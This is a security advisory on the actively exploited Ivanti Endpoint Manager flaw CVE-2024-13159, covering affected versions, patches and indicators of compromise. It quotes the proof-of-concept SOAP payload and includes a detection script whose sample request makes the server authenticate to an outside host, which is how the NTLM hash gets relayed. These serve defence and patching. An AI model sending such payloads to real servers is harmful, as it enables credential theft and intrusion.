Executive Summary

    A path traversal flaw in Ivanti Endpoint Manager, affecting versions up to and including the 2024 November Security Update and the 2022 SU6 November Security Update, allows a remote, unauthenticated attacker to leak sensitive information. On January 13th, software vendor Ivanti published a security advisory detailing a critical vulnerability (CVE-2024-13159) in its Ivanti Endpoint Manager (EPM) product. On March 10th, CISA added this and two related Ivanti EPM vulnerabilities (CVE-2024-13160, CVE-2024-13161) to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation of these vulnerabilities by threat actor groups. The most severe vulnerability, CVE-2024-13159, could allow an unauthenticated attacker to bypass authentication and gain unauthorized access to confidential system information. Ivanti strongly recommends that affected organizations apply the available security updates as soon as possible to mitigate this risk.

    Affected Ivanti EPM servers are sometimes exposed to the internet by design for remote management of endpoints. As a result, successful exploitation of this vulnerability provides threat actors a way to access sensitive server data, potentially including information to gain access into affected organizations’ networks to facilitate attack activity and lateral movement.

    Ivanti has released patches for Ivanti EPM along with their advisory, and details can be found below.

    Beazley Security strongly recommends organizations immediately apply patches for affected Ivanti products and review affected systems for signs of compromise.

    Affected Systems or Products

    These vulnerabilities affect Ivanti EPM. For details refer to the table below.

    Product       Affected                                          Unaffected
    Ivanti EPM    EPM 2024 November Security Update and prior       EPM 2024 January-2025 Security Update
    Ivanti EPM    EPM 2022 SU6 November Security Update and prior   EPM 2022 SU6 January-2025 Security Update

    Security hot patches have been made available from Ivanti for EPM core servers and remote consoles. Please see the Patches section of this advisory for more information.

    Mitigations / Workarounds

    The best mitigation to this threat is to apply the available security patches provided by Ivanti for their EPM product. If possible, limit network access to the Ivanti EPM server by restricting access to trusted networks so that only expected, trusted systems can access the server.

    Patches

    Patches for affected Ivanti EPM services have been made available from Ivanti. To download patches, Ivanti customers can log into the Ivanti Licensing System (ILS). Ivanti has provided this guide on how to download software. Specific patch installation steps for each version are provided in Ivanti’s original advisory, with additional instructions on how to troubleshoot patch errors if any arise for EPM 2024 flat and EPM 2022 SU6.

    Indicators of Compromise

    At the time of this advisory, Ivanti has not provided any indicators of compromise. It is recommended that any exposed, vulnerable systems be monitored and checked for any signs of unauthorized access or compromise.

    From the proof-of-concept code, unexpected web posts containing the payload:

    <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
    <wildcard>\\\\{}\\tmp\\file1.txt</wildcard>
    </GetHashForWildcardRecursive>

    to the EPM server endpoint located at ‘<server>/WSVulnerabilityCore/VulCore.asmx’ may indicate attempts to exploit this vulnerability.

    Another indicator of attack may be unexpected NTLM authentication attempts from the Ivanti EPM server to other infrastructure, especially if authentication attempts are observed to untrusted internet facing systems.
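    The two indicators above can be checked together against captured request bodies (from a WAF, reverse proxy or full-packet capture, since IIS logs do not record POST bodies). The following is an added detection example written for this advisory, not Ivanti's or the researchers' code: it flags POSTs to the VulCore.asmx endpoint that call GetHashForWildcardRecursive, and extracts the host named in a UNC-style wildcard, which is the system the EPM server would be coerced into authenticating to. The `{}` in the advisory's payload is a placeholder for that host; the sample requests, IP addresses and finding fields here are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

VULN_ENDPOINT = "/wsvulnerabilitycore/vulcore.asmx"  # advisory endpoint, compared case-insensitively
SUSPICIOUS_METHODS = {"GetHashForWildcardRecursive"}
# A UNC path (\\host\share\...) makes the server reach out to "host"; ..\ walks out of a directory.
UNC_RE = re.compile(r"^\\\\([A-Za-z0-9.\-_]+)\\")
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]  # strip a namespace such as {http://tempuri.org/}


def check_request(src_ip: str, path: str, body: str) -> "dict | None":
    """Return a finding for a captured POST matching the exploit pattern, else None."""
    if not path.lower().startswith(VULN_ENDPOINT):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None  # not XML; outside this indicator's scope
    for elem in root.iter():  # works for a bare element or one inside a SOAP envelope
        if _local(elem.tag) not in SUSPICIOUS_METHODS:
            continue
        wildcard = next((c.text or "" for c in elem if _local(c.tag) == "wildcard"), "")
        unc = UNC_RE.match(wildcard)
        if unc:
            severity = "high"  # server would authenticate to a remote host: NTLM relay risk
        elif TRAVERSAL_RE.search(wildcard):
            severity = "high"  # reads outside the intended directory
        else:
            severity = "medium"  # unauthenticated call to the method itself; review the caller
        return {"src_ip": src_ip, "method": _local(elem.tag), "wildcard": wildcard,
                "coerced_host": unc.group(1) if unc else None, "severity": severity}
    return None


# Constructed sample requests (src_ip, path, body); addresses are from documentation ranges.
SAMPLE_REQUESTS = [
    ("198.51.100.7", "/WSVulnerabilityCore/VulCore.asmx",
     '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
     '<GetHashForWildcardRecursive xmlns="http://tempuri.org/">'
     r'<wildcard>\\203.0.113.5\tmp\file1.txt</wildcard></GetHashForWildcardRecursive>'
     '</soap:Body></soap:Envelope>'),
    ("10.0.0.12", "/WSVulnerabilityCore/VulCore.asmx",
     '<GetHashForWildcardRecursive xmlns="http://tempuri.org/">'
     r'<wildcard>C:\ProgramData\*.dat</wildcard></GetHashForWildcardRecursive>'),
    ("10.0.0.20", "/remote/health", "<ping/>"),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    return [f for f in (check_request(*r) for r in requests) if f]
```

    A "high" finding with a coerced_host outside the organization's own address space corresponds directly to the second indicator: the EPM server being driven to authenticate to an untrusted, internet-facing system.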

    Impacted customers should contact Ivanti support via their Success Portal to report incidents and obtain additional incident response support.

    Technical Details

    A path traversal vulnerability was disclosed in Ivanti EPM which, if exploited, could allow an attacker to retrieve sensitive information from the EPM server. Specifically, the vulnerabilities were found in the WSVulnerabilityCore.dll component bundled with Ivanti’s EPM software. Exploitation could lead to unauthorized access and privilege escalation within a network environment.

    Per horizon3.ai’s write-up on the Ivanti EPM vulnerabilities, specific methods within the affected dynamic-link library (DLL) can be called and manipulated to cause the EPM server to attempt to read every file in a given directory. The GetHashForWildcardRecursive method within the DLL is used to process file paths when computing hashes, but it does not properly validate its input.

    Because of this, an attacker can send crafted input to an unauthenticated, remotely accessible endpoint on the EPM service (/WSVulnerabilityCore/VulCore.asmx). That input can cause the server to attempt to access remote paths over the network, which could in turn enable a relay attack.

    By forcing the server to authenticate to an attacker-controlled system via such a remote path, a relay attack running on the attacker’s system could steal the EPM machine account credentials when the server tries to authenticate. If successful, the attacker’s system could capture authentication details such as the account name and NTLM hash from the victim’s server.

    How Beazley Security is responding

    Beazley Security is monitoring client perimeter devices through our Karma product to identify impacted devices and support organizations to remediate any issues found.

    We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.